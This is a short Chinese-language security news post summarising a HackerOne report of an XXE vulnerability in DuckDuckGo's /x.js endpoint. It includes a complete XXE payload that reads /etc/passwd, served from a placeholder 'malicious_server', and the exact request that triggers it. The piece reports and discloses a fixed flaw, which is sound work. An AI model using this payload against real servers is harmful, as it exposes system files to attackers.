DuckDuckGo搜索引擎的XXE漏洞

iso60001  1906天前

22.png

近期,白帽汇安全研究院发现hackerone网站披露了DuckDuckGo搜索引擎的一个XXE漏洞。

DuckDuckGo是一个出现于2011年的互联网搜索引擎,其总部位于美国宾夕法尼亚州。和传统搜索引擎(谷歌,必应等)相比,DuckDuckGo着重保护用户的隐私,不监控、不记录用户的搜索内容,还会自动处理用户发出HTTP请求中的敏感信息(如Referer头),尽量减少第三方能获取的信息。

漏洞详情

漏洞发现者在浏览测试https://duckduckgo.com网站时,发现在路径/x.js中的参数?u存在XXE注入。

只要输入一个远程的xm l资源http://malicious_server/xxe.xm l,服务器就会解析并执行,并返回一个输出。

而且网站对xm l代码没有任何控制,所以攻击者可以引入一些恶意xm l代码,对服务器进行攻击。

具体步骤如下

1.攻击者在他所控制的服务器中放上一个恶意xm l文件,并对公网开放,文件内容如下。

<?xm l version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<creds>
    <user>&xxe;</user>
    <pass>mypass</pass>
</creds>    

2.直接访问链接https://duckduckgo.com/x.js?u=http://malicious_server/xxe.xm l

3.返回的页面可以看到xm l文件解析结果

33.png

在确认了漏洞后,DuckDuckGo工作人员也对其表示了感谢。

44.png

本文由白帽汇整理并翻译,不代表白帽汇任何观点和立场
来源:https://hackerone.com/reports/483774

最新评论

昵称
邮箱
提交评论